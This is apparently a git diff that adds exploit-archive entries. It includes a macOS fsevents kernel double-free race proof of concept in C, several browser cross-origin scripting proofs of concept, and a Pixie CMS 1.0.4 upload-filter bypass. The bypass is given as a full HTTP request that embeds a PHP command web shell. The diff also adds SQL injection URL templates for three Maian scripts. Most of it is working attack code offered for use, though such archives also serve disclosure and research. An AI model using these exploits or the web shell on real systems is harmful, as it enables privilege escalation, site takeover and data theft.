+ + + \ No newline at end of file diff --git a/platforms/multiple/dos/41814.html b/platforms/multiple/dos/41814.html new file mode 100755 index 000000000..758187250 --- /dev/null +++ b/platforms/multiple/dos/41814.html @@ -0,0 +1,195 @@ + + + + + + + + \ No newline at end of file diff --git a/platforms/multiple/local/41804.c b/platforms/multiple/local/41804.c new file mode 100755 index 000000000..3e65383d8 --- /dev/null +++ b/platforms/multiple/local/41804.c @@ -0,0 +1,220 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1129 + +fseventsf_ioctl handles ioctls on fsevent fds acquired via FSEVENTS_CLONE_64 on /dev/fsevents + +Heres the code for the FSEVENTS_DEVICE_FILTER_64 ioctl: + + case FSEVENTS_DEVICE_FILTER_64: + if (!proc_is64bit(vfs_context_proc(ctx))) { + ret = EINVAL; + break; + } + devfilt_args = (fsevent_dev_filter_args64 *)data; + + handle_dev_filter: + { + int new_num_devices; + dev_t *devices_not_to_watch, *tmp=NULL; + + if (devfilt_args->num_devices > 256) { + ret = EINVAL; + break; + } + + new_num_devices = devfilt_args->num_devices; + if (new_num_devices == 0) { + tmp = fseh->watcher->devices_not_to_watch; <------ (a) + + lock_watch_table(); <------ (b) + fseh->watcher->devices_not_to_watch = NULL; + fseh->watcher->num_devices = new_num_devices; + unlock_watch_table(); <------ (c) + + if (tmp) { + FREE(tmp, M_TEMP); <------ (d) + } + break; + } + +There's nothing stopping two threads seeing the same value for devices_not_to_watch at (a), +assigning that to tmp then freeing it at (d). The lock/unlock at (b) and (c) don't protect this. + +This leads to a double free, which if you also race allocations from the same zone can lead to an +exploitable kernel use after free. + +/dev/fsevents is: +crw-r--r-- 1 root wheel 13, 0 Feb 15 14:00 /dev/fsevents + +so this is a privesc from either root or members of the wheel group to kernel + +tested on MacOS 10.12.3 (16D32) on MacbookAir5,2 + +(build with -O3) + +The open handler for the fsevents device node has a further access check: + + if (!kauth_cred_issuser(kauth_cred_get())) { + return EPERM; + } + +restricting this issue to root only despite the permissions on the device node (which is world-readable) +*/ + + +// ianbeer +#if 0 +MacOS/iOS kernel double free due to bad locking in fsevents device + +fseventsf_ioctl handles ioctls on fsevent fds acquired via FSEVENTS_CLONE_64 on /dev/fsevents + +Heres the code for the FSEVENTS_DEVICE_FILTER_64 ioctl: + + case FSEVENTS_DEVICE_FILTER_64: + if (!proc_is64bit(vfs_context_proc(ctx))) { + ret = EINVAL; + break; + } + devfilt_args = (fsevent_dev_filter_args64 *)data; + + handle_dev_filter: + { + int new_num_devices; + dev_t *devices_not_to_watch, *tmp=NULL; + + if (devfilt_args->num_devices > 256) { + ret = EINVAL; + break; + } + + new_num_devices = devfilt_args->num_devices; + if (new_num_devices == 0) { + tmp = fseh->watcher->devices_not_to_watch; <------ (a) + + lock_watch_table(); <------ (b) + fseh->watcher->devices_not_to_watch = NULL; + fseh->watcher->num_devices = new_num_devices; + unlock_watch_table(); <------ (c) + + if (tmp) { + FREE(tmp, M_TEMP); <------ (d) + } + break; + } + +There's nothing stopping two threads seeing the same value for devices_not_to_watch at (a), +assigning that to tmp then freeing it at (d). The lock/unlock at (b) and (c) don't protect this. + +This leads to a double free, which if you also race allocations from the same zone can lead to an +exploitable kernel use after free. + +/dev/fsevents is: +crw-r--r-- 1 root wheel 13, 0 Feb 15 14:00 /dev/fsevents + +so this is a privesc from either root or members of the wheel group to kernel + +tested on MacOS 10.12.3 (16D32) on MacbookAir5,2 + +(build with -O3) +#endif + +#include +#include +#include +#include +#include +#include + +#include + +typedef uint64_t user64_addr_t; + +typedef struct fsevent_clone_args64 { + user64_addr_t event_list; + int32_t num_events; + int32_t event_queue_depth; + user64_addr_t fd; +} fsevent_clone_args64; + +#define FSEVENTS_CLONE_64 _IOW('s', 1, fsevent_clone_args64) + +#pragma pack(push, 4) +typedef struct fsevent_dev_filter_args64 { + uint32_t num_devices; + user64_addr_t devices; +} fsevent_dev_filter_args64; +#pragma pack(pop) + +#define FSEVENTS_DEVICE_FILTER_64 _IOW('s', 100, fsevent_dev_filter_args64) + +void* racer(void* thread_arg){ + int fd = *(int*)thread_arg; + printf("started thread\n"); + + fsevent_dev_filter_args64 arg = {0}; + int32_t dev = 0; + + while (1) { + arg.num_devices = 1; + arg.devices = (user64_addr_t)&dev; + int err = ioctl(fd, FSEVENTS_DEVICE_FILTER_64, &arg); + + if (err == -1) { + perror("error in FSEVENTS_DEVICE_FILTER_64\n"); + exit(EXIT_FAILURE); + } + + arg.num_devices = 0; + arg.devices = (user64_addr_t)&dev; + + err = ioctl(fd, FSEVENTS_DEVICE_FILTER_64, &arg); + + if (err == -1) { + perror("error in FSEVENTS_DEVICE_FILTER_64\n"); + exit(EXIT_FAILURE); + } + } + + return NULL; +} +int main(){ + int fd = open("/dev/fsevents", O_RDONLY); + if (fd == -1) { + perror("can't open fsevents device, are you root?"); + exit(EXIT_FAILURE); + } + + // have to FSEVENTS_CLONE this to get the real fd + fsevent_clone_args64 arg = {0}; + int event_fd = 0; + int8_t event = 0; + + + arg.event_list = (user64_addr_t)&event; + arg.num_events = 1; + arg.event_queue_depth = 1; + arg.fd = (user64_addr_t)&event_fd; + + int err = ioctl(fd, FSEVENTS_CLONE_64, &arg); + + if (err == -1) { + perror("error in FSEVENTS_CLONE_64\n"); + exit(EXIT_FAILURE); + } + + if (event_fd != 0) { + printf("looks like we got a new fd %d\n", event_fd); + } else { + printf("no new fd\n"); + } + + pid_t pid = fork(); + if (pid == 0) { + racer(&event_fd); + } else { + racer(&event_fd); + } + + + return 1; +} \ No newline at end of file diff --git a/platforms/multiple/webapps/41799.html b/platforms/multiple/webapps/41799.html new file mode 100755 index 000000000..ef76c3860 --- /dev/null +++ b/platforms/multiple/webapps/41799.html @@ -0,0 +1,48 @@ + + +"use strict"; + +document.write("click anywhere to start"); + +window.onclick = () => { + let w = open("about:blank", "one"); + let d = w.document; + + let a = d.createElement("a"); + a.href = "https://abc.xyz/"; + a.click(); <<------- about:blank -> Document::InPageCache + + let it = setInterval(() => { + try { + w.location.href.toString; + } catch (e) { + clearInterval(it); + + let s = d.createElement("a"); <<------ about:blank's document + s.href = "javascript:alert(location)"; + s.click(); + } + }, 0); +}; + + + \ No newline at end of file diff --git a/platforms/multiple/webapps/41800.html b/platforms/multiple/webapps/41800.html new file mode 100755 index 000000000..3c3bcc1b4 --- /dev/null +++ b/platforms/multiple/webapps/41800.html @@ -0,0 +1,70 @@ + + +"use strict"; + +let f = document.body.appendChild(document.createElement("iframe")); +f.onload = () => { + f.onload = null; + + try { + let iterator = document.createNodeIterator(document, NodeFilter.SHOW_ALL, f.contentWindow); + iterator.nextNode(); + } catch (e) { + e.constructor.constructor("alert(location)")(); + } +}; + +f.src = "https://abc.xyz/"; diff --git a/platforms/multiple/webapps/41801.html b/platforms/multiple/webapps/41801.html new file mode 100755 index 000000000..644866a2b --- /dev/null +++ b/platforms/multiple/webapps/41801.html @@ -0,0 +1,51 @@ + + +"use strict"; + +let f = document.body.appendChild(document.createElement("iframe")); +let get_element = f.contentWindow.Function("return logo;"); + +f.onload = () => { + f.onload = null; + + let node = get_element(); + + var sc = document.createElement("script"); + sc.innerText = "alert(location)"; + node.appendChild(sc); +}; + +f.src = "https://abc.xyz/"; + + \ No newline at end of file diff --git a/platforms/multiple/webapps/41802.html b/platforms/multiple/webapps/41802.html new file mode 100755 index 000000000..4dd37156c --- /dev/null +++ b/platforms/multiple/webapps/41802.html @@ -0,0 +1,86 @@ + + +var d = document.body.appendChild(document.createElement("div")); +var s = d.attachShadow({mode: "open"}); + +var f = s.appendChild(document.createElement("iframe")); + +f.onload = () => { + f.onload = null; + + f.src = "javascript:alert(location)"; + + var xml = ` + +`; + + var v = document.body.appendChild(document.createElement("iframe")); + v.src = URL.createObjectURL(new Blob([xml], {type: "text/xml"})); +}; + +f.src = "https://abc.xyz/"; + + \ No newline at end of file diff --git a/platforms/multiple/webapps/41803.html b/platforms/multiple/webapps/41803.html new file mode 100755 index 000000000..be87d9141 --- /dev/null +++ b/platforms/multiple/webapps/41803.html @@ -0,0 +1,34 @@ + + +let rs = new ReadableStream(); +let cons = rs.getReader().constructor; + +rs.getReader = 0x12345; +new cons(rs); + + \ No newline at end of file diff --git a/platforms/php/webapps/41784.txt b/platforms/php/webapps/41784.txt new file mode 100755 index 000000000..de40ac858 --- /dev/null +++ b/platforms/php/webapps/41784.txt @@ -0,0 +1,108 @@ +# Exploit Title: File Extension Filter Bypass in File Manager Pixie 1.0.4 With Low Privilege # Google Dork: no +# Date: 02-April-2017 +# Exploit Author: @rungga_reksya, @dvnrcy, @dickysofficial +# Vendor Homepage: http://www.getpixie.co.uk +# Software Link: https://us.softpedia-secure-download.com/dl/44791fdde14260bc7a8d08df65bcd048/58db4b5c/700044699/webscripts/php/pixie_v1.04.zip +# Version: 1.0.4 +# CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H (7.5 - HIGH)# CVE-2017-7402 + +I. Background: +Pixie is a free, open source web application that will help quickly create your own website. Many people refer to this type of software as a "content management system (cms)", we prefer to call it as Small, Simple, Site Maker. + +II. Description: +in Pixie CMS have three types for account privilege for upload: +- Administrator - Can access file manager but restricted extension for file upload. +- Client - Can access file manager but restricted extension for file upload. +- User - Cannot access file manager + +Generally Pixie CMS have restricted extension for file upload and we cannot upload php extension. in normally if we upload php file, Pixie CMS will give information rejected like this “Upload failed. Please check that the folder is writeable and has the correct permissions set”. + +III. Exploit: +In this case, we used privilege as client and then access to “file manager” (http://ip_address/folder_pixie_v1.04/admin/index.php?s=publish&x=filemanager). Please follow this step: + +1. Prepare software to intercept (I used burpsuite free edtion). +2. Prepare for real image (our_shell.jpg). +3. Browse your real image on file manager pixie cms and click to upload button. +4. Intercept and change of filename “our_shell.jpg” to be “our_shell.jpg.php” +5. Under of perimeter “Content-Type: image/jpeg”, please change and write your shell. in this example, I use cmd shell. +6. If you done, forward your edit request in burpsuite and the pixie cms will give you information like this “our_shell.jpg.php was successfully uploaded”. +7. PWN (http://ip_address/folder_pixie_v1.04/files/other/our_shell.jpg.php?cmd=ipconfig) + +———— +POST /pixie_v1.04/admin/index.php?s=publish&x=filemanager HTTP/1.1 +Host: 192.168.1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.1.1/pixie_v1.04/admin/index.php?s=publish&x=filemanager +Cookie: INTELLI_843cae8f53=ovfo0mpq3t2ojmcphj320geku1; loader=loaded; INTELLI_dd03efc10f=2sf8jl7fjtk3j50p0mgmekpt72; f9f33fc94752373729dab739ff8cb5e7=poro8kl89grlc4dp5a4odu2c05; PHPSESSID=1ml97c15suo30kn1dalsp5fig4; bb2_screener_=1490835014+192.168.1.6; pixie_login=client%2C722b69fa2ae0f040e4ce7f075123cb18 +Connection: close +Content-Type: multipart/form-data; boundary=---------------------------8321182121675739546763935949 +Content-Length: 901 + +-----------------------------8321182121675739546763935949 +Content-Disposition: form-data; name="upload[]"; filename="our_shell.jpg.php" +Content-Type: image/jpeg + +"; +        $cmd = ($_REQUEST['cmd']); +        system($cmd); +        echo ""; +        die; +} +?> + +-----------------------------8321182121675739546763935949 +Content-Disposition: form-data; name="file_tags" + +ourshell +-----------------------------8321182121675739546763935949 +Content-Disposition: form-data; name="submit_upload" + +Upload +-----------------------------8321182121675739546763935949 +Content-Disposition: form-data; name="MAX_FILE_SIZE" + +102400 +-----------------------------8321182121675739546763935949 +Content-Disposition: form-data; name="bb2_screener_" + +1490835014 192.168.1.6 +-----------------------------8321182121675739546763935949-- + This is our screenshot from PoC:  +| | +| Upload for valid image + | + +  +| | +| Change extension and insert your shell + | + +  +| | +| Your shell success to upload on server + | + +  +| | +| Example command for ipconfig + | + +  +| | +| Example command for net user + | + + + + +IV. Thanks to: +- Alloh SWT +- MyBoboboy +- @rungga_reksya, @dvnrcy, @dickysofficial +- Komunitas IT Auditor & IT Security Kaskus + diff --git a/platforms/php/webapps/41787.txt b/platforms/php/webapps/41787.txt new file mode 100755 index 000000000..3c4268b47 --- /dev/null +++ b/platforms/php/webapps/41787.txt @@ -0,0 +1,26 @@ +# # # # # +# Exploit Title: Maian Uploader Script v4.0 - SQL Injection +# Google Dork: N/A +# Date: 04.04.2017 +# Vendor Homepage: http://www.maiansoftware.com/ +# Software: http://www.maianuploader.com/?dl=yes +# Demo: http://www.maiansoftware.com/demos/uploader/ +# Version: 4.0 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# #ihsansencan +# # # # # +# SQL Injection/Exploit : +# Login as regular user +# http://localhost/[PATH]/index.php?cmd=view&user=[SQL] +# mu_members:id +# mu_members:joindate +# mu_members:sign_date +# mu_members:joinstamp +# mu_members:username +# mu_members:email +# mu_members:accpass +# # # # # diff --git a/platforms/php/webapps/41788.txt b/platforms/php/webapps/41788.txt new file mode 100755 index 000000000..dc6447a1f --- /dev/null +++ b/platforms/php/webapps/41788.txt @@ -0,0 +1,18 @@ +# # # # # +# Exploit Title: Maian Survey v1.1 - SQL Injection +# Google Dork: N/A +# Date: 04.04.2017 +# Vendor Homepage: http://www.maiansoftware.com/ +# Software: http://www.maiansurvey.com/?dl=yes +# Demo: http://www.maiansoftware.com/demos/survey/ +# Version: 1.1 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# #ihsansencan +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?cmd=surveys&survey=[SQL] +# # # # # diff --git a/platforms/php/webapps/41789.txt b/platforms/php/webapps/41789.txt new file mode 100755 index 000000000..c3f16de9c --- /dev/null +++ b/platforms/php/webapps/41789.txt @@ -0,0 +1,18 @@ +# # # # # +# Exploit Title: Maian Greetings v2.1 - SQL Injection +# Google Dork: N/A +# Date: 04.04.2017 +# Vendor Homepage: http://www.maiansoftware.com/ +# Software: http://www.maiangreetings.com/?dl=yes +# Demo: http://www.maiansoftware.com/demos/greetings/ +# Version: 2.1 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# #ihsansencan +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?cmd=search&keywords=a&cat=[SQL] +# # # # # \ No newline at end of file